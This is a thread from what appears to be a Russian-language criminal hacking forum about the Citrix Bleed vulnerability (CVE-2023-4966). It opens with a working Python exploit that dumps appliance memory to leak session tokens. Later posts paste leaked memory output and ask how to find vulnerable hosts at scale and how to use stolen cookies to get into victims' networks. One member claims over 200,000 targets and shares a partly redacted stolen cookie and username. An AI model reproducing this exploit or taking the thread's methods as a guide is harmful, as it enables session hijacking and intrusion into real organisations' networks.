Web Citrix | CVE-2023-4966

0x00x0 · 25.10.2023

Info: https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966

exploit:

Python:

#!/usr/bin/env python3

import sys
import requests
import urllib3
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

parser = argparse.ArgumentParser()
parser.add_argument('--target', help='The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)')
args = parser.parse_args()

if args.target is None:
    print('Target must be provided (e.g. --target 192.168.1.200)')
    sys.exit(0)

hostname = args.target

if __name__ == "__main__":
    headers = {
        "Host": "a"*24576
    }
    r = requests.get(f"https://{hostname}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False,timeout=10)
    if r.status_code == 200:
        print("--- Dumped Memory ---")
        print(r.text[131050:])
        print("---      End      ---")
    else:
        print("Could not dump memory")

574LK3R0d · 27.10.2023

Есть query у кого для скана в Censys с уязвимостью?

Prokhorenco · 27.10.2023

We love assetnote <3 helping to keep cybercrime alive!

KeyBit · 30.10.2023

Подскажите что делать дальше, после получения логина и куков, не могу применить их

Temas · 30.10.2023

У вас хоть что-то пробивает эксплоит?

Wolverine · 30.10.2023

Temas сказал(а):

У вас хоть что-то пробивает эксплоит?

Да

KeyBit · 31.10.2023

Wolverine сказал(а):

Да

Объем есть, нужно дальнейшие развитие событий

KeyBit · 31.10.2023

Balora19 мышь за что дизлайк??

Script_186 · 01.11.2023

i tried the exploit it works but i don't get the session token i tried the exploit on 30 vulnerable target

KeyBit · 01.11.2023

Script_186 сказал(а):

i tried the exploit it works but i don't get the session token i tried the exploit on 30 vulnerable target

у меня есть токены, там все работает, штук 30

PAYDAY · 02.11.2023

KeyBit сказал(а):

у меня есть токены, там все работает, штук 30

В сеть через ситрикс удавалось уже попасть? Или тоже на этапе открытия окна с RDP, но попасть не можешь, так как кредов нет?

baryshnikov · 02.11.2023

не понял. везде =@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

подскажите пожалуйста

Script_186 · 03.11.2023

PAYDAY сказал(а):

В сеть через ситрикс удавалось уже попасть? Или тоже на этапе открытия окна с RDP, но попасть не можешь, так как кредов нет?

нет, я вообще не получаю session token

Script_186 · 03.11.2023

KeyBit сказал(а):

у меня есть токены, там все работает, штук 30

Код:

--- Dumped Memory ---
aaaaaaaaaaaaaaaaaaaaa ��♀�     ►      �   ♣   ☺☺☺☻♣ ☺☻♣      ☻  ☼          ☺        ♫     �♂  �♂  ↕   ☺ ☺       �♣,  ♀   %7cd0dc04-df8a-45a4-92ab-f08f7240a395 �   ☺   ☺∟☺ ☺  ▬Citrix.TcpProxyServicece                                                                                                                                                                                                                                         ��♀�     ►      ��U�ORjḙ��h{�13.0.91.13                     ♂                                                                                                                                                                        �►R♫☺   cd443f0c536f0663885389ef0ed82d8e                                                                                                                                                                                                                                                                                                                                 HTTP/1.1 200 OK
Content-Length: @@@@@
Encode:@@@
Cache-control: no-cache
Pragma: no-cache
Content-Type: text/html
Set-Cookie: NSC_AAAC=@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;Secure;HttpOnly;Path=/

�                                                                                                                                                                                                                                                                                                                 ns_true                                                                                                                                                                                                                                                                                                                                   
---      End      ---

здесь нет токена сеанса, и у меня есть 30 подобных уязвимых целей, эксплойт работает, но я не получаю токен сеанса

KeyBit · 03.11.2023

Script_186 сказал(а):

Код:

--- Dumped Memory ---
aaaaaaaaaaaaaaaaaaaaa ��♀�     ►      �   ♣   ☺☺☺☻♣ ☺☻♣      ☻  ☼          ☺        ♫     �♂  �♂  ↕   ☺ ☺       �♣,  ♀   %7cd0dc04-df8a-45a4-92ab-f08f7240a395 �   ☺   ☺∟☺ ☺  ▬Citrix.TcpProxyServicece                                                                                                                                                                                                                                         ��♀�     ►      ��U�ORjḙ��h{�13.0.91.13                     ♂                                                                                                                                                                        �►R♫☺   cd443f0c536f0663885389ef0ed82d8e                                                                                                                                                                                                                                                                                                                                 HTTP/1.1 200 OK
Content-Length: @@@@@
Encode:@@@
Cache-control: no-cache
Pragma: no-cache
Content-Type: text/html
Set-Cookie: NSC_AAAC=@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;Secure;HttpOnly;Path=/

�                                                                                                                                                                                                                                                                                                                 ns_true                                                                                                                                                                                                                                                                                                                                  
---      End      ---

здесь нет токена сеанса, и у меня есть 30 подобных уязвимых целей, эксплойт работает, но я не получаю токен сеанса

и у меня есть 30 подобных уязвимых целей >> у меня 200к+

Извени не правильно выразился там выдает логин и куки Vulnerable to CVE-2023-4966. Endpoint: https://xx.1x.1x3.xx6, Cookie: 54d55xxxxff195xxx5bxxxx9ff1550xxx5525d5f4xxxx5e445a4a42, Username: mate

Wolverine · 03.11.2023

Script_186 сказал(а):

Код:

--- Dumped Memory ---
aaaaaaaaaaaaaaaaaaaaa ��♀�     ►      �   ♣   ☺☺☺☻♣ ☺☻♣      ☻  ☼          ☺        ♫     �♂  �♂  ↕   ☺ ☺       �♣,  ♀   %7cd0dc04-df8a-45a4-92ab-f08f7240a395 �   ☺   ☺∟☺ ☺  ▬Citrix.TcpProxyServicece                                                                                                                                                                                                                                         ��♀�     ►      ��U�ORjḙ��h{�13.0.91.13                     ♂                                                                                                                                                                        �►R♫☺   cd443f0c536f0663885389ef0ed82d8e                                                                                                                                                                                                                                                                                                                                 HTTP/1.1 200 OK
Content-Length: @@@@@
Encode:@@@
Cache-control: no-cache
Pragma: no-cache
Content-Type: text/html
Set-Cookie: NSC_AAAC=@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;Secure;HttpOnly;Path=/

�                                                                                                                                                                                                                                                                                                                 ns_true                                                                                                                                                                                                                                                                                                                                  
---      End      ---

здесь нет токена сеанса, и у меня есть 30 подобных уязвимых целей, эксплойт работает, но я не получаю токен сеанса

--- Dumped Memory ---
aaaaaaaaaaaaaaaaaaaaa ��♀� ► � ♣ ☺☺☺☻♣ ☺☻♣ ☻ ☼ ☺ ♫ �♂ �♂ ↕ ☺ ☺ �♣, ♀ %7cd0dc04-df8a-45a4-92ab-f08f7240a395 � ☺ ☺∟☺ ☺ ▬Citrix.TcpProxyServicece ��♀� ► ��U�ORjḙ��h{�13.0.91.13 ♂ �►R♫☺ cd443f0c536f0663885389ef0ed82d8e HTTP/1.1 200 OK
Content-Length: @@@@@
Encode:@@@
Cache-control: no-cache
Pragma: no-cache
Content-Type: text/html
Set-Cookie: NSC_AAAC=@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;Secure;HttpOnly;Path=/

� ns_true
--- End ---

Script_186 · 04.11.2023

Wolverine сказал(а):

--- Dumped Memory ---
aaaaaaaaaaaaaaaaaaaaa ��♀� ► � ♣ ☺☺☺☻♣ ☺☻♣ ☻ ☼ ☺ ♫ �♂ �♂ ↕ ☺ ☺ �♣, ♀ %7cd0dc04-df8a-45a4-92ab-f08f7240a395 � ☺ ☺∟☺ ☺ ▬Citrix.TcpProxyServicece ��♀� ► ��U�ORjḙ��h{�13.0.91.13 ♂ �►R♫☺ cd443f0c536f0663885389ef0ed82d8e HTTP/1.1 200 OK
Content-Length: @@@@@
Encode:@@@
Cache-control: no-cache
Pragma: no-cache
Content-Type: text/html
Set-Cookie: NSC_AAAC=@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;Secure;HttpOnly;Path=/

� ns_true
--- End ---

не могу войти, есть видео, где можно использовать poc пытаюсь, не могу использовать эксплойт

Desconocido · 04.11.2023

попробовал заюзать этот пок https://github.com/Chocapikk/CVE-2023-4966 , загрузил список хостов , https://:IP но ничего не происходит, или нужно грузить именно https://domain.com ?

Script_186 · 05.11.2023

Desconocido сказал(а):

попробовал заюзать этот пок https://github.com/Chocapikk/CVE-2023-4966 , загрузил список хостов , https://:IP но ничего не происходит, или нужно грузить именно https://domain.com ?

Скрипт, опубликованный 0x00x0, работает нормально, но я не получил никакой пользы от этого эксплойта

WellDone · 05.11.2023

Нету там нормальных доступов уже. можете не тратить время

Web Citrix | CVE-2023-4966

HDD-drive

RAM

(L3) cache

RAID-массив

HDD-drive

(L2) cache

RAID-массив

RAID-массив

HDD-drive

RAID-массив

Премиум

CD-диск

HDD-drive

HDD-drive

RAID-массив

(L2) cache

HDD-drive

Mundus vult decipi, ergo decipiatur

Вложения

HDD-drive

Скрипт, опубликованный 0x00x0, работает нормально, но я не получил никакой пользы от этого эксплойта​

(L3) cache

Скрипт, опубликованный 0x00x0, работает нормально, но я не получил никакой пользы от этого эксплойта